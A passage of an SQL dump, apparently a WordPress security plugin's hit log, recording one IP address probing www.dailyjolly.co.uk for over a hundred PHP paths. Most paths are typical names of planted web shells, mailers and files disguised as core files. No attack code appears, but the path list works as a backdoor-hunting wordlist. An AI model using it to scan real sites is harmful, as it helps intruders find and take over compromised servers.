8h','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-walker-category-dropdown-ajax-response.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344609.2645,55,'b8hZPq69Fes3tydHEI0jva5G','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-cdomize-admin.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344609.5946,55,'xZkelJR7bFpH0cVIzYUTighj','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-customize-control-wp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344609.9396,55,'VmfOIBlANLYDZH2a3i549TjR','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-customize-setting-meta.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344610.2508,55,'1JKHE0hoD4eVSlFqTAcQg68N','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-http-curl-stream.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344610.5648,55,'kZK3D0uMI1L7jn9hJpNAH82d','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-http-encoding-ajax.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344610.9103,55,'jLR2SvyKioYJtkc4nDI5sMpd','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-metadata-lazyloader-ajax.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344611.2989,55,'qKXaSuD7jcm41YsEWvdy0fJi','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-metadata-lazyloader-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344611.6244,55,'ELYlDdMcQ6XjfV8C4rmAp3uT','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-oembed-controller-private.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344611.9662,55,'LhxX8RrVQCtWeE1oKDcIpZFq','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-session-tokens-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344612.2986,55,'zXtRfjG14Lkyq8MTEKZ79DCb','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-simplepie-sanitize-kses-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344612.6121,55,'fRILBu4VMj0tsTPWciqDpz9S','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-upgrade.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344612.9280,55,'9rjxhoeKiVXQ1Oy5ap2BuL3P','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-uploads.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344613.2573,55,'EphzNcj1UvxqrJRoDOTCYLSg','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-user-request-meta.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344613.6279,55,'cOw2aqIB61MEPrDi4sxzoKmW','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-widget-ajax-response.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344613.9543,55,'waN9iC4hV372D5BpIzymXnrE','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-widget-side.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344614.3137,55,'MrmVRIFCn6hqkJTLYic7G4a3','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/cof.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344614.6443,55,'H679CWDXedI3vaJLKmnAyl5V','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/comment-meta.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344614.9649,55,'AGsJrdKk481yaISq6V7LEZov','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/compat-ajax-response.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344615.3352,55,'6FyhnOgdZfJAbKeki1m5sltS','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344615.6526,55,'EVBzWD0hoOpXnPZNQC8RT96e','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/cY4bsE.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344615.9945,55,'Snj3PkfARd4xVHiBg8ThLGrN','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/email.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344616.3472,55,'qchrtl4fDX8Hi1Q9u6P3UbdN','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/embed-template-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344616.6765,55,'nFIPxliqR1C05SMZmAu4zGO3','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/emusuf.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344617.0001,55,'Snult9qpmM7ZPRBTDwkYKLWg','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/error-protection-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344617.3227,55,'DvkV96ZeH0pyXKzxa27F4Ets','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/feed-rss2-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344617.6567,55,'da7TqoWgBhFPL1kcpxzSHrE2','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/flickr.class.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344618.0042,55,'1Q3fKTFXHCVE5OwU0Y6qzSGt','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/gindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344618.3705,55,'dVahi7c6sHfmKwk452u0BJro','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/GOj9m.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344618.7033,55,'xi0k5DY78aA3CQ2VKydRT6F4','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/Hk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344619.0504,55,'VBotjLT5YPG1p6yMi0JDRwxI','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/includes.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344619.3738,55,'572rTWkpIJSAvQyol3NXZHqm','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/json.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344619.7218,55,'Lk3DNCjxt27yfBguaFq0InPb','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/jvc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344620.0480,55,'8pctk6CzuFOx71dQPawUnvN9','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/kab.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344620.4085,55,'Iu7Hp9Zi1ESjzhyYT4dOe3U5','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ms_config.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344620.7601,55,'IaN5sjRbpzE3WtD4HrhmxlKG','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/nav-menu-private.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344621.1077,55,'TIgOAHXlPxhoEGFni9vktY3V','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/notice.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344621.4373,55,'b3Tz6ks2VvRAxXI8KigwZl7F','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/options-index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344621.7991,55,'5RFINtGOoEKWA3sUcQJaj1kh','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/PR1eg.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344622.1833,55,'cIMTdq9ULjeWRgVwKt4H6m02','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/programa_apoyo_editoriales.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344622.5320,55,'8ZFPJq2GAcVKoHWL5yE7Usnm','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/revision-meta.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344622.8902,55,'msHzMLZfWaR4DISyTC1c0G2g','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/revo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344623.2203,55,'O4pdNi3auSMDI8AvXkbhYJeQ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/RxR_iblkjmoy.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344623.6543,55,'GPFLcgvnsE9Kk76xuSCZa1qb','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/safeparam-doctype.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344623.9705,55,'gCpkxT8OAZQfPiB45KwlqebI','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/seo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344624.3071,55,'KCnY6URZ0qHeLGI3mPlXv4kT','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/settings.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344624.6618,55,'QTko7fMwjnEODKZzS3p0YvqC','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/shell20211028.php.suspected',0,19,0),('167.172.248.229',2813130981,'',0,1674344625.0140,55,'Be0rchLV3lZbHi85WqfnsoIU','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/sidwso.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344625.3582,55,'sQJVMeYpD78WLZhvIn0dfkiq','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/sk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344625.6814,55,'Jv3i96fLzo2ywScAk8rYFCt4','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/system.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344626.0083,55,'Z8FSoGfMn2HV0yKQlxhw5Yit','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/tax2.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344626.3237,55,'lYRAZv7q6Baj3Ufcd5HL28mh','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/trio-kece.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344626.6881,55,'4TgvdHFtkzlx0NG8ifjb7DB3','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/uplaod.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344627.0308,55,'LPNRkSVAECuv0lyp2jbJZh9s','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/uploadzip.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344627.3841,55,'GRWngcolzr4Kxd1bwBJkEt9V','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/user-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344627.7578,55,'sFpwBWxC0RzJ2hKHgAbfucvO','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/users.php.suspected',0,19,0),('167.172.248.229',2813130981,'',0,1674344628.1115,55,'sWUAwvyEYac9efPq26LO5VIM','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/vjgtd8LW.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344628.4669,55,'gUcwvOsSGHEWTC9I0NFDdyqf','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-2019.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344628.7955,55,'mIO9y8Uci3sBkr4tMHzAgVfw','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344629.1448,55,'RpPg73J0Dy8jEemYLosIkiOM','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-gypqic.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344629.5576,55,'QZCkNd1wRs0LJvgEPK92Vt3r','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes/admin-bar.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344629.9065,55,'53wdHGgtehklnvLsF289BU7y','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-log.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344630.2358,55,'K7CauedYSGitwyIUrcZJgjTD','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-logs.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344630.5625,55,'vIPYnOKVNBC39A12eMGb0mhx','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-mail.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344630.9361,55,'YOxbtrnuo0QMvyIUcaCjq5VE','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-type.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344631.3801,55,'ftvPB18nNpxikdb4hY5m37VH','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wpspl-load-compat.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344631.7378,55,'CcwTfiHze63qvglYI0rd2AaX','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344632.1385,55,'RjeWN4MEuGy7L0qoK6vdVHmT','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/assets/alfa4.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344632.7717,55,'A358KhXDbn1EHeUCvc9JQZPI','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/block-supports/layout-ajax-response.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344633.1039,55,'w6aFq7RhzWgsif4QyUmu9kIv','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/comments-popup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344633.4306,55,'axnCicpHFB29ltT1YZXP5mD8','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/image_type_to_mime_type.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344633.7442,55,'ySQeb9V7KXiEJO8srzFpHPdM','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/submenu-pspell.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344634.0639,55,'9wH4I2Z05lak3BmegJyRjVuc','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/wp-conflg.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344634.4084,50,'2giSGqHTfDd63mMjIwZzLenC','','10|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674344634.4335,55,'2giSGqHTfDd63mMjIwZzLenC','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344634.7516,55,'4HDFyMsY9Z7LPTtW28gGaRhS','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/01%20copy.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344635.0940,55,'k59tDXzvKqFUeyV8JLZi0gAj','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/01589a.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344635.4276,55,'4FGIBelMwYrhyTiXKVNCDEfP','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/88981.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344635.8051,55,'rCzVtybFSOHWKsewxj6J2vlm','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/bimowdoodk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344636.1346,55,'HqlJD872jnVaus5NKkUSxyzT','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css-blog.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344636.4605,55,'TYg1e4tAwfZkr50Cj2xMzIn3','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/mpv2.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344636.7944,55,'ytSlX56RE8WazUIdJwxPKTgL','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/str_replace.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344637.1126,55,'ATm6p5JNq7ZUtRnzBFXOG0f9','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/customize/elbjewpi.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344637.4249,55,'1CJMj4t6l3k0hcSmzNRrafFp','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/customize/inpf8747384.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344637.7571,55,'r8GlyX9BdgSEVW7IzLZ2umxp','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/setcookie.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344638.0802,55,'U6C1VmWhQJAnTGaqlupXBw5L','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/sqlite_pagebreak_adapter.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344638.4203,55,'f2QAiDU7wdvBlkbaHsWoLNh8','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/l.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344638.7570,55,'6ONTLtBk4XcZzAKW0gQi9GbC','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/license.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344639.0729,55,'7y1KHJ9q6e4nASIzcsXTv8Z0','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/module.audio-video.riff-wp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344639.4206,55,'MTZe7ord2sHShYf61KI5ENxj','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/tablepress_controllers.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344639.7672,55,'qfa8ySK5YsVZ4igeGpO1RPwF','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/unzipper.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344640.0889,55,'g1WNo0LAwO2InQKFHvSTpuUe','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/vp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344640.4050,55,'o3w7IYr0GH4W6ke1sfCM8qjJ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/wp-plugins.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344640.7326,55,'EX1tFrndZjqIM8xGBW9TlKRy','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/acces.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344641.0657,55,'Sq4iRoPz9OMxm7Q2TLYl1fDG','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/configure.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344641.4173,55,'KX7V6QkWHOAEvzb3NUrYlx8a','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/img911.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344641.7656,55,'CJS0sUrmo5fy4KM3AlHice1F','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/IXR/opt.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344642.1009,55,'yGlmA3u0cHEhSVwBrqMWTjI1','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/IXR/tablepress_controllers.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344642.4177,55,'0l6sbALaYeNKzGF8JDqMwHIj','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/auto.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344642.7920,55,'xz6RX5nPwLAVB9vKr3uG0bOF','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/old.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344643.1323,55,'OiIVLXfRZcvWb09kj7tBxy1d','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/system.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344643.4643,55,'M8jrt9oWqIfcQepi4nNBFvR2','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/247@abu.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344643.7816,55,'k7Y6TDMS4Cl5BOFA312uEKaN','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/bak.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344644.1230,55,'ofnNaczT6QFlpWjB0ShuUw1I','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/css_.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344644.5040,55,'pbZ2IQg0CvNe1rXi7FMcw9Jh','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/Oilmoney.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344644.9029,55,'q1QmVUF8BAvogp9dcN3LKXH5','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/tablepress_controllers.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344645.2454,55,'Ezhv6rq9kCt2NKMsRadcY7PA','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/treame.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344645.5616,55,'0qQTHV9LOc3Eihuk5ybAstoJ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/user-new.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344645.8875,55,'mRu0MAFdz3xfjswN4Wy5TItL','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/wp-y4y54.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344646.2354,55,'1aXmz4HVWeLdnhQ0ry2BcEPg','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/yellow.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344646.5751,55,'2trsORIKfhHF0UmvwNnqgeXy','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/zlib.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344646.9221,55,'9cLvu3xnTAJSIKjXlhZNHPEF','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/random_compat/random_bytes_cyclone.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344647.2592,55,'P9sXTHZyK0MJoilBdgexwDrq','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/SimplePie/acces.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344647.5738,55,'YkZAFHxa8OwWu7qBg2T5ymcD','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/theme-compat/back-up.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344647.9869,55,'eaXfFBPkLYxwoV12nKbcJpyM','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/theme-compat/border.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344648.3548,55,'u1JykhtdqNRf5TDnWxmwIOFp','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/theme-compat/ok.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344648.6811,55,'JLnPCt5FOUwX2p7ZayeGYRrV','','19|0|0|0|www.dailyjolly.co.uk/.well-known/leafmailer2.8.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344649.0291,55,'sBIDqeQlzMHdkL8u6vY1TrEA','','19|0|0|0|www.dailyjolly.co.uk/.well-known/mail.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344649.3550,55,'QXzfnRFJYIhakEZH8qUesWD5','','19|0|0|0|www.dailyjolly.co.uk/files/x3dleaf.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344649.7136,55,'dqA9HIVOUp8wjvb7RZofJEsx','','19|0|0|0|www.dailyjolly.co.uk/files/mailer.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344650.0482,55,'GulQXHcnaPR6KfCxbZIyr0pY','','19|0|0|0|www.dailyjolly.co.uk/.well-known/js.php/.well-known/mail.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344650.4039,55,'rTSKvCFyqpdjNoJ0G9kuAYfc','','19|0|0|0|www.dailyjolly.co.uk/.well-known/dze.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344650.7147,55,'dWPNUzox4R8mFZcwlC5gTrpX','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/%20.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344651.0401,55,'lhzr1MHj8ckJbg046dZIFKnY','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/dx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344651.3786,55,'to0sfROmnyGWFUNp1KQgSrVu','','19|0|0|0|www.dailyjolly.co.uk/.well-known/utchiha505.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344651.7027,55,'PORFnfUckr8X3ue9QWIm2w1z','','19|0|0|0|www.dailyjolly.co.uk/01.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344652.0198,55,'m6yIYnkFfjZNWC58oU7G9Qiz','','19|0|0|0|www.dailyjolly.co.uk/02.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344652.3890,55,'7rZvdhi6PyU5NfWgk0mwROIz','','19|0|0|0|www.dailyjolly.co.uk/0z.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344652.7616,55,'gv3OLG5SUY6VCz2XDajW9xiw','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344653.0819,55,'iMxoBpGLvOlHySEVwdIAk6Rr','','19|0|0|0|www.dailyjolly.co.uk/1337.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344653.4169,55,'P2HmedJ9U6pGwX7RbxlTovuM','','19|0|0|0|www.dailyjolly.co.uk/1h6j5.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344653.7485,55,'zsOc6TefqodgWH91tlPCmaLX','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344654.0838,100,'fXZKjuvQ4nPdEwtao9xWmSUe','','13|0|0|0|www.dailyjolly.co.uk/1index.php',0,13,0),('167.172.248.229',2813130981,'',0,1674344654.4124,55,'aCiUfXT4EY07R5Lqs1yVFvxh','','19|0|0|0|www.dailyjolly.co.uk/2index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344654.7643,100,'t8Up7LyzXeW9mQxbfsFZiwGV','','13|0|0|0|www.dailyjolly.co.uk/2index.php',0,13,0),('167.172.248.229',2813130981,'',0,1674344655.1325,55,'I3yaL4MtfNcHZxChrmWFsdDA','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344655.4544,100,'yWX0Qho98raLmA4dJgijv3R1','','13|0|0|0|www.dailyjolly.co.uk/3x.php',0,13,0),('167.172.248.229',2813130981,'',0,1674344655.7902,55,'rehuv3wqJ7ZXHRdPAOlC6ILB','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344656.1435,55,'uHXrB2sWi0EOGvKJMmzxUqRf','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344656.5196,55,'gXlKCGYIAHBDe1RQLNtojOkV','','19|0|0|0|www.dailyjolly.co.uk/4price.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344656.9205,55,'7aRAkm39sNypDJ5UwKnqLH6I','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344657.2746,55,'sVj4qy3m9Lwnhfr1O6GFADZx','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344657.5972,55,'uJEOcaW5tGLYlZFyvmfrMbS9','','19|0|0|0|www.dailyjolly.co.uk/admin/controller/extension/wpm.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344657.9310,55,'KreCAtdBQPJi2mZOp3MUxa1q','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344658.2476,55,'n1bVYrltvM48jwzFS20g5UKo','','19|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/ups.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344658.5583,55,'3QFM4klVa1zsmi92TtpUWwAP','','19|0|0|0|www.dailyjolly.co.uk/autoload_classmap.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344658.8973,55,'ZAeHafY7lqso9dNGwBJCuL1F','','19|0|0|0|www.dailyjolly.co.uk/baindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344659.2188,55,'SAgldj3wsmuhRIq4D68y9ZLB','','19|0|0|0|www.dailyjolly.co.uk/C.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344659.5443,55,'FCAazQU0HSm6OrysTtuiEWvR','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344659.8597,55,'ZRJp0QdfCcn5GBoljHSk6XsL','','19|0|0|0|www.dailyjolly.co.uk/crypted.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344660.1712,55,'eXnxgGaIiHqFRWzML6vSZcOk','','19|0|0|0|www.dailyjolly.co.uk/css/4O4.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344660.5252,55,'PGJlUfs5jeDiuB6tSXvHTWF7','','19|0|0|0|www.dailyjolly.co.uk/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344660.8479,100,'L9YnONqR0tv8H1osSe3U7mci','','13|0|0|0|www.dailyjolly.co.uk/DKIZ.php',0,13,0),('167.172.248.229',2813130981,'',0,1674344661.1732,55,'CmxhIwPoZbc9are8Y5yAkLXd','','19|0|0|0|www.dailyjolly.co.uk/doc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344661.5032,55,'jAzoqCfY60eUQBsRlyZL1Jhg','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('167.172.248.229',2813130981,'',0,1674344661.8308,55,'A9sYCUE1qR7DZjcWFd6kzbtP','','19|0|0|0|www.dailyjolly.co.uk/good.php',0,19,0),('167.172.248.229',2813130981